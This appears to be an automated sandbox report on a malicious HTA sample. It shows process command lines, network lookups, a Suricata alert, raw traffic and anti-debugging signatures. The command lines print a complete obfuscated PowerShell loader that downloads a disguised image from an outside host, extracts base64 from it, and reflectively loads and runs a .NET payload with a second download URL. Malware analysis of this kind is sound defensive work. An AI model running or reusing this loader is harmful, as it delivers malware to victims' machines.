Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Sept. 13, 2023, 9:38 a.m. | Sept. 13, 2023, 9:40 a.m. |
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\hkcmd.hta.html
1960-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€
€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
2620-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)"
2776
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com | CNAME a1952.dscq.akamai.net, CNAME identrust.edgesuite.net | 23.67.53.17 |
uploaddeimagens.com.br | 172.67.215.45 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49176 -> 104.21.45.138:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49176 104.21.45.138:443 | C=US, O=Let's Encrypt, CN=E1 | CN=uploaddeimagens.com.br | 67:68:c4:e4:aa:54:e1:fd:f0:50:01:73:1e:da:cf:48:0c:17:0d:34 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
file | C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€C
Q€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)" |
cmdline | powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€
HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD |
Data received | [ |
Data received | Weß ?I^d*ú]#ê±ÛðDOWNGRD ¿| [Çýv} |2»62¿«è73EÀÌ®¤À ÿ |
Data received | P |
Data received | |
Data received | ALÆUú¨eL ÂÓÚ´¥SXÛ.þ2 _fã)#ÔVjW54°Ø£1B½ïnn°´}þû sѬ F0D X °,çÛ¤Ã:ÿQ.2.©ÍØ+M¢áD(> rýû¯ £Èå~b`!ÀÝþñRzfy¿Ñ Ê̸ |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | qò_âåº\ÐtuïÝÌ&ãVõ{ô 1XsÀ= Páè^ÝvZ |
Data sent | y ue×%Ð53Ó#.Ø⥨ÅÚ¼(¬Ñ²Y¢ÙÔ / 5 ÀÀÀ À 2 8 4ÿ uploaddeimagens.com.br |
Data sent | F BAÝô2çä:v×//ª×LUª}Õä/7ÿËƵQãÑÍ»m¿èë; ä1 £hÒż#=®1Òûg´8W 0ïoôÐû´+L0ó!¾ö SQ@ÜËO'íÿ7Tg4»eÃ!I¨Q§ |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1960 CREDAT:145409 |
host | 117.18.232.200 |
parent_process | iexplore.exe | martian_process | powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€